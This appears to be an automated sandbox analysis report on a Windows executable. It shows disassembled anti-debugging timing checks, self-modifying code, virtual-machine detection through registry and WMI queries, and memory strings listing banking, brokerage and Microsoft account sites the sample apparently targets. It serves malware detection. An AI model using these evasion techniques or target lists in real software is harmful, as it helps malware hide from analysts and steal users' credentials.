              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60583 second address: 4E60604 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test al, al 0x00000009 pushad 0x0000000a mov ax, di 0x0000000d pushfd 0x0000000e jmp 00007F9284AFDC8Dh 0x00000013 jmp 00007F9284AFDC8Bh 0x00000018 popfd 0x00000019 popad 0x0000001a je 00007F9284AFDE7Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9284AFDC8Bh 0x00000029 jmp 00007F9284AFDC93h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F9284AFDC98h 0x00000035 jmp 00007F9284AFDC95h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60604 second address: 4E6062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8951h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B894Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6067C second address: 4E60685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3317h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60685 second address: 4E606C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F92851B8958h 0x0000000d push eax 0x0000000e jmp 00007F92851B894Bh 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F92851B8950h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E606C6 second address: 4E606D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60749 second address: 4E6076E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 cmp dword ptr [ebp-14h], edi 0x0000000a jmp 00007F92851B894Fh 0x0000000f jne 00007F92F6CB667Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6076E second address: 4E60772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60772 second address: 4E60776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60776 second address: 4E6077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6077C second address: 4E607DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F92851B8954h 0x00000009 and al, FFFFFFF8h 0x0000000c jmp 00007F92851B894Bh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebx, dword ptr [ebp+08h] 0x00000018 jmp 00007F92851B8956h 0x0000001d lea eax, dword ptr [ebp-2Ch] 0x00000020 jmp 00007F92851B8950h 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dl, 13h 0x0000002b push ecx 0x0000002c pop ebx 0x0000002d popad 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607DB second address: 4E607E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607E1 second address: 4E607E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607E5 second address: 4E607E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E607E9 second address: 4E60821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F92851B8956h 0x00000010 and cl, 00000018h 0x00000013 jmp 00007F92851B894Bh 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60821 second address: 4E60825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60825 second address: 4E60833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60833 second address: 4E60839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60839 second address: 4E6083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6083D second address: 4E60899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F9284AFDC8Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F9284AFDC91h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F9284AFDC8Eh 0x00000020 jmp 00007F9284AFDC95h 0x00000025 popfd 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60899 second address: 4E608D9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F92851B8950h 0x00000008 and esi, 125EBA98h 0x0000000e jmp 00007F92851B894Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F92851B8955h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E608D9 second address: 4E608FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 176499C2h 0x00000008 mov si, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9284AFDC91h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6092A second address: 4E60013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, eax 0x00000009 pushad 0x0000000a mov di, si 0x0000000d mov si, 00DFh 0x00000011 popad 0x00000012 test esi, esi 0x00000014 jmp 00007F92851B8952h 0x00000019 je 00007F92F6CB664Bh 0x0000001f xor eax, eax 0x00000021 jmp 00007F928519207Ah 0x00000026 pop esi 0x00000027 pop edi 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d nop 0x0000002e cmp eax, 00000000h 0x00000031 setne cl 0x00000034 xor ebx, ebx 0x00000036 test cl, 00000001h 0x00000039 jne 00007F92851B8947h 0x0000003b jmp 00007F92851B8ABBh 0x00000040 call 00007F9289941BE5h 0x00000045 mov edi, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007F92851B894Ah 0x0000004f movzx eax, di 0x00000052 popad 0x00000053 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60013 second address: 4E6003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9284AFDC90h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx esi, di 0x00000016 mov ch, bh 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6003E second address: 4E60044 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60044 second address: 4E60067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov bl, ch 0x0000000f movsx edi, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60067 second address: 4E6006D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6006D second address: 4E6007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9284AFDC8Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6007C second address: 4E600FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8959h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F92851B894Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F92851B8951h 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b jmp 00007F92851B8957h 0x00000020 popad 0x00000021 xchg eax, ecx 0x00000022 jmp 00007F92851B8956h 0x00000027 mov dword ptr [ebp-04h], 55534552h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E600FC second address: 4E60100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60100 second address: 4E60106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60106 second address: 4E60115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9284AFDC8Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60C83 second address: 4E60C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60C87 second address: 4E60C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60C8D second address: 4E60CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8952h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F92851B894Eh 0x00000011 adc ah, FFFFFF88h 0x00000014 jmp 00007F92851B894Bh 0x00000019 popfd 0x0000001a jmp 00007F92851B8958h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F92851B894Eh 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60CED second address: 4E60DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9284AFDC91h 0x00000009 sub eax, 4CC10006h 0x0000000f jmp 00007F9284AFDC91h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F9284AFDC90h 0x0000001b xor ch, FFFFFFA8h 0x0000001e jmp 00007F9284AFDC8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 pushad 0x00000029 call 00007F9284AFDC94h 0x0000002e mov bx, ax 0x00000031 pop ecx 0x00000032 jmp 00007F9284AFDC97h 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b mov bh, al 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F9284AFDC97h 0x00000044 sub ch, FFFFFFAEh 0x00000047 jmp 00007F9284AFDC99h 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F9284AFDC90h 0x00000053 and ecx, 70C94828h 0x00000059 jmp 00007F9284AFDC8Bh 0x0000005e popfd 0x0000005f popad 0x00000060 popad 0x00000061 cmp dword ptr [769B459Ch], 05h 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b push ebx 0x0000006c pop ecx 0x0000006d push edi 0x0000006e pop esi 0x0000006f popad 0x00000070 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60DDE second address: 4E60DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60DE4 second address: 4E60DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60DE8 second address: 4E60DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60E46 second address: 4E60E4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60E4E second address: 4E60EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 6F57E8F6h 0x0000000c jmp 00007F92851B8954h 0x00000011 xor dword ptr [esp], 19CD74DEh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F92851B894Eh 0x0000001f adc eax, 075F54D8h 0x00000025 jmp 00007F92851B894Bh 0x0000002a popfd 0x0000002b mov ah, AFh 0x0000002d popad 0x0000002e call 00007F92F6CAD61Eh 0x00000033 push 76952B70h 0x00000038 push dword ptr fs:[00000000h] 0x0000003f mov eax, dword ptr [esp+10h] 0x00000043 mov dword ptr [esp+10h], ebp 0x00000047 lea ebp, dword ptr [esp+10h] 0x0000004b sub esp, eax 0x0000004d push ebx 0x0000004e push esi 0x0000004f push edi 0x00000050 mov eax, dword ptr [769B4538h] 0x00000055 xor dword ptr [ebp-04h], eax 0x00000058 xor eax, ebp 0x0000005a push eax 0x0000005b mov dword ptr [ebp-18h], esp 0x0000005e push dword ptr [ebp-08h] 0x00000061 mov eax, dword ptr [ebp-04h] 0x00000064 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006b mov dword ptr [ebp-08h], eax 0x0000006e lea eax, dword ptr [ebp-10h] 0x00000071 mov dword ptr fs:[00000000h], eax 0x00000077 ret 0x00000078 pushad 0x00000079 call 00007F92851B894Dh 0x0000007e mov bx, cx 0x00000081 pop esi 0x00000082 popad 0x00000083 mov esi, 00000000h 0x00000088 push eax 0x00000089 push edx 0x0000008a jmp 00007F92851B894Fh 0x0000008f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60EC8 second address: 4E60ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60ECE second address: 4E60ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60ED2 second address: 4E60ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60ED6 second address: 4E60EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-1Ch], esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ah, 03h 0x00000010 push ebx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60EE9 second address: 4E60EFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9284AFDC8Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60EFA second address: 4E60EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60F10 second address: 4E60F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E60F14 second address: 4E60F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 call 00007F92851B8951h 0x0000000a pop eax 0x0000000b pop edi 0x0000000c popad 0x0000000d test al, al 0x0000000f jmp 00007F92851B894Ch 0x00000014 je 00007F92F6C9C390h 0x0000001a pushad 0x0000001b mov ax, 505Dh 0x0000001f jmp 00007F92851B894Ah 0x00000024 popad 0x00000025 cmp dword ptr [ebp+08h], 00002000h 0x0000002c pushad 0x0000002d call 00007F92851B894Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E806D8 second address: 4E806F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9284AFDC92h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E806F7 second address: 4E8079D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d pushfd 0x0000000e jmp 00007F92851B8950h 0x00000013 adc ecx, 11F9D088h 0x00000019 jmp 00007F92851B894Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov bx, si 0x00000026 mov si, 70F7h 0x0000002a popad 0x0000002b xchg eax, esi 0x0000002c jmp 00007F92851B894Ah 0x00000031 push eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F92851B8951h 0x00000039 add cx, 2656h 0x0000003e jmp 00007F92851B8951h 0x00000043 popfd 0x00000044 mov ecx, 58A103C7h 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b jmp 00007F92851B894Ah 0x00000050 mov esi, dword ptr [ebp+0Ch] 0x00000053 pushad 0x00000054 jmp 00007F92851B894Eh 0x00000059 movzx ecx, di 0x0000005c popad 0x0000005d test esi, esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8079D second address: 4E807A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807A1 second address: 4E807B7 instructions: 0x00000000 rdtsc 0x00000002 mov bl, 22h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, si 0x00000009 popad 0x0000000a je 00007F92F6C86552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807B7 second address: 4E807BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807BB second address: 4E807BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E807BF second address: 4E807C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80872 second address: 4E80878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80878 second address: 4E8087C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6FEF8E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6FEE89 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 89D8C7 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6FC14E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 929466 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 3192Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5576Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000002.2293233357.0000000000880000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2212081244.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
